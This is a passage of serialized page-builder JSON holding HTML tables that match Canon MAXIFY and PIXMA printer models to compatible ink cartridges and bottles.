(Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment 